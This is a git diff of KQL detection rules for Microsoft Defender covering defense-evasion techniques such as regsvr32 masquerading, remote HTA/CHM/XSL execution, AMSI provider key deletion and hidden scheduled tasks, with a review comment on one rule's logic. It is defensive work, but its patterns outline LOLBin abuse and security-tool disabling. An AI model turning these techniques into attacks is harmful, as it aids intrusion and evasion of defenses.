-// Date: 2021-11-29
-// Level: high
-// Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.010
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Regsvr32 DLL Execution With Suspicious File Extension
+// Author: Florian Roth (Nextron Systems), frack113
+// Date: 2021-11-29
+// Level: high
+// Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith ".bin" or ProcessCommandLine endswith ".bmp" or ProcessCommandLine endswith ".cr2" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".eps" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".ico" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".nef" or ProcessCommandLine endswith ".orf" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".raw" or ProcessCommandLine endswith ".rtf" or ProcessCommandLine endswith ".sr2" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tif" or ProcessCommandLine endswith ".tiff" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".txt") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql b/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql
index f2e6928a..3225331f 100644
--- a/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql
+++ b/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql
@@ -1,12 +1,12 @@
-// Title: Regsvr32 Execution From Highly Suspicious Location
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-26
-// Level: high
-// Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.010
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Regsvr32 Execution From Highly Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: high
+// Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains "\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains "\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains 
"\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\Tasks\\" or ProcessCommandLine contains "\\Windows\\Tracing\\") or ((ProcessCommandLine contains " \"C:\\" or ProcessCommandLine contains " C:\\" or ProcessCommandLine contains " 'C:\\" or ProcessCommandLine contains "D:\\") and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\" or ProcessCommandLine contains "C:\\Program Files\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " \"C:\\Windows\\" or ProcessCommandLine contains " 'C:\\Windows\\"))))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql b/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql
index c0686fd3..b16dd95f 100644
--- a/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql
+++ b/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql
@@ -1,12 +1,12 @@
-// Title: Regsvr32 Execution From Potential Suspicious Location
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-26
-// Level: medium
-// Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.010
-// False Positives:
-// - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary.
-
-DeviceProcessEvents
+// Title: Regsvr32 Execution From Potential Suspicious Location
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: medium
+// Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql b/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql
index 1c403f04..2d3a7a36 100644
--- a/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql
+++ b/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql
@@ -1,10 +1,10 @@
-// Title: Remote Access Tool - RURAT Execution From Unusual Location
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-19
-// Level: medium
-// Description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Remote Access Tool - RURAT Execution From Unusual Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-19
+// Level: medium
+// Description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe") or ProcessVersionInfoProductName =~ "Remote Utilities") and (not((FolderPath startswith "C:\\Program Files\\Remote Utilities" or FolderPath startswith "C:\\Program Files (x86)\\Remote Utilities")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql b/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql
index 313674f4..4c8c2c45 100644
--- a/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql
+++ b/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql
@@ -1,10 +1,10 @@
-// Title: Remote CHM File Download/Execution Via HH.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-29
-// Level: high
-// Description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.001
-
-DeviceProcessEvents
+// Title: Remote CHM File Download/Execution Via HH.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-29
+// Level: high
+// Description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "\\\\") and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql b/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql
index 77b5df98..6053c9df 100644
--- a/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql
+++ b/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql
@@ -1,10 +1,10 @@
-// Title: Remote Code Execute via Winrm.vbs
-// Author: Julia Fomina, oscd.community
-// Date: 2020-10-07
-// Level: medium
-// Description: Detects an attempt to execute code or create service on remote host via winrm.vbs.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1216
-
-DeviceProcessEvents
+// Title: Remote Code Execute via Winrm.vbs
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects an attempt to execute code or create service on remote host via winrm.vbs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "winrm" and ProcessCommandLine contains "invoke Create wmicimv2/Win32_" and ProcessCommandLine contains "-r:http") and (FolderPath endswith "\\cscript.exe" or ProcessVersionInfoOriginalFileName =~ "cscript.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql b/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql
index 28938509..4f2df68f 100644
--- a/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql
+++ b/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql
@@ -1,10 +1,10 @@
-// Title: Remote File Download Via Findstr.EXE
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020-10-05
-// Level: medium
-// Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
-
-DeviceProcessEvents
+// Title: Remote File Download Via Findstr.EXE
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -v " or ProcessCommandLine contains " /v " or ProcessCommandLine contains " –v " or ProcessCommandLine contains " —v " or ProcessCommandLine contains " ―v ") and (ProcessCommandLine contains " -l " or ProcessCommandLine contains " /l " or ProcessCommandLine contains " –l " or ProcessCommandLine contains " —l " or ProcessCommandLine contains " ―l ") and ProcessCommandLine contains "\\\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql b/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql
index ddeb538c..87d6e351 100644
--- a/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql
+++ b/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql
@@ -1,12 +1,12 @@
-// Title: Remote XSL Execution Via Msxsl.EXE
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023-11-09
-// Level: high
-// Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1220
-// False Positives:
-// - Msxsl is not installed by default and is deprecated, so unlikely on most systems.
-
-DeviceProcessEvents
+// Title: Remote XSL Execution Via Msxsl.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: high
+// Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+// - Msxsl is not installed by default and is deprecated, so unlikely on most systems.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "http" and FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql b/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql
index dfee6a59..98fe8929 100644
--- a/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql
+++ b/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql
@@ -1,10 +1,10 @@
-// Title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses
-// Author: frack113
-// Date: 2021-07-13
-// Level: high
-// Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses
+// Author: frack113
+// Date: 2021-07-13
+// Level: high
+// Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisablementCommand" or ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisableme"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql b/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql
index e0719599..9537c7d5 100644
--- a/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql
+++ b/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql
@@ -1,10 +1,10 @@
-// Title: Remotely Hosted HTA File Executed Via Mshta.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-08
-// Level: high
-// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218.005
-
-DeviceProcessEvents
+// Title: Remotely Hosted HTA File Executed Via Mshta.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-08
+// Level: high
+// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.005
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql b/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql
index ee4a4e4b..ef8733f2 100644
--- a/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql
+++ b/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql
@@ -1,12 +1,12 @@
-// Title: Removal Of AMSI Provider Registry Keys
-// Author: frack113
-// Date: 2021-06-07
-// Level: high
-// Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Removal Of AMSI Provider Registry Keys
+// Author: frack113
+// Date: 2021-06-07
+// Level: high
+// Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "{2781761E-28E0-4109-99FE-B9D127C57AFE}" or RegistryKey endswith "{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}") and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql b/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql
index 280e5b30..41f0ea4a 100644
--- a/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql
+++ b/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql
@@ -1,10 +1,10 @@
-// Title: Removal Of Index Value to Hide Schedule Task - Registry
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-26
-// Level: medium
-// Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562
-
-DeviceRegistryEvents
+// Title: Removal Of Index Value to Hide Schedule Task - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-26
+// Level: medium
+// Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceRegistryEvents
 | where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql b/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql
index cdb6d9ad..de6ae2a0 100644
--- a/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql
+++ b/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql
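Review bot: The Tree-path predicate on the context line, `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*"`, can never be true, because KQL's `endswith` compares literally and the trailing `*` is an ordinary character rather than a wildcard; the same predicate appears in the SD-value hunk that follows (removal_of_sd_value_to_hide_schedule_task_registry.kql). The changed lines in both hunks look line-ending-only, so this reads as a pre-existing conversion artifact rather than something the commit introduced, but it leaves both rules silent. As I read the DeviceRegistryEvents schema, a `RegistryValueDeleted` event carries the deleted value's name in `RegistryValueName` rather than in `RegistryKey`, so `RegistryKey contains "Index"` would also miss the case the title describes. I would rewrite the filter as `| where ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted") and RegistryKey contains "\\Schedule\\TaskCache\\Tree\\" and (RegistryValueName =~ "Index" or RegistryKey endswith "\\Index")` and apply the same shape with `"SD"` in the next file, which also narrows its current `RegistryKey contains "SD"` clause.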
@@ -1,10 +1,10 @@
-// Title: Removal Of SD Value to Hide Schedule Task - Registry
-// Author: Sittikorn S
-// Date: 2022-04-15
-// Level: medium
-// Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562
-
-DeviceRegistryEvents
+// Title: Removal Of SD Value to Hide Schedule Task - Registry
+// Author: Sittikorn S
+// Date: 2022-04-15
+// Level: medium
+// Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceRegistryEvents
 | where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "SD")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql b/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql
index 491b558b..a7be8874 100644
--- a/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql
+++ b/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql
@@ -1,12 +1,12 @@
-// Title: Remove Immutable File Attribute
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-15
-// Level: medium
-// Description: Detects usage of the 'chattr' utility to remove immutable file attribute.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1222.002
-// False Positives:
-// - Administrator interacting with immutable files (e.g. for instance backups).
-
-DeviceProcessEvents
+// Title: Remove Immutable File Attribute
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects usage of the 'chattr' utility to remove immutable file attribute.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.002
+// False Positives:
+// - Administrator interacting with immutable files (e.g. for instance backups).
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -i " and FolderPath endswith "/chattr"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql b/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql
index fd65b999..a6ff966a 100644
--- a/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql
+++ b/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql
@@ -1,11 +1,11 @@
-// Title: Remove Scheduled Cron Task/Job
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-15
-// Level: medium
-// Description: Detects usage of the 'crontab' utility to remove the current crontab.
-// This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Remove Scheduled Cron Task/Job
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects usage of the 'crontab' utility to remove the current crontab.
+// This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -r" and FolderPath endswith "crontab"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql b/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql
index 31f52e5c..be62ef8f 100644
--- a/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql
+++ b/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed AutoHotkey.EXE Execution
-// Author: Nasreddine Bencherchali
-// Date: 2023-02-07
-// Level: medium
-// Description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Renamed AutoHotkey.EXE Execution
+// Author: Nasreddine Bencherchali
+// Date: 2023-02-07
+// Level: medium
+// Description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where (ProcessVersionInfoProductName contains "AutoHotkey" or ProcessVersionInfoFileDescription contains "AutoHotkey" or (ProcessVersionInfoOriginalFileName in~ ("AutoHotkey.exe", "AutoHotkey.rc"))) and (not(((FolderPath endswith "\\AutoHotkey.exe" or FolderPath endswith "\\AutoHotkey32.exe" or FolderPath endswith "\\AutoHotkey32_UIA.exe" or FolderPath endswith "\\AutoHotkey64.exe" or FolderPath endswith "\\AutoHotkey64_UIA.exe" or FolderPath endswith "\\AutoHotkeyA32.exe" or FolderPath endswith "\\AutoHotkeyA32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU32.exe" or FolderPath endswith "\\AutoHotkeyU32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU64.exe" or FolderPath endswith "\\AutoHotkeyU64_UIA.exe") or FolderPath contains "\\AutoHotkey")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql b/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql
index 912b2b4c..0901b0db 100644
--- a/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql
+++ b/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed BOINC Client Execution
-// Author: Matt Anderson (Huntress)
-// Date: 2024-07-23
-// Level: medium
-// Description: Detects the execution of a renamed BOINC binary.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1553
-
-DeviceProcessEvents
+// Title: Renamed BOINC Client Execution
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detects the execution of a renamed BOINC binary.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "BOINC.exe" and (not(FolderPath endswith "\\BOINC.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql b/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql
index 60a038c9..438f1514 100644
--- a/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql
+++ b/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql
@@ -1,12 +1,12 @@
-// Title: Renamed CreateDump Utility Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-09-20
-// Level: high
-// Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
-// False Positives:
-// - Command lines that use the same flags
-
-DeviceProcessEvents
+// Title: Renamed CreateDump Utility Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-20
+// Level: high
+// Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - Command lines that use the same flags
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains " -u " and ProcessCommandLine contains " -f " and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains " --full " and ProcessCommandLine contains " --name " and ProcessCommandLine contains ".dmp")) or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") and (not(FolderPath endswith "\\createdump.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql b/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql
index c53a40fd..44a49312 100644
--- a/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql
+++ b/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql
@@ -1,12 +1,12 @@
-// Title: Renamed Mavinject.EXE Execution
-// Author: frack113, Florian Roth
-// Date: 2022-12-05
-// Level: high
-// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
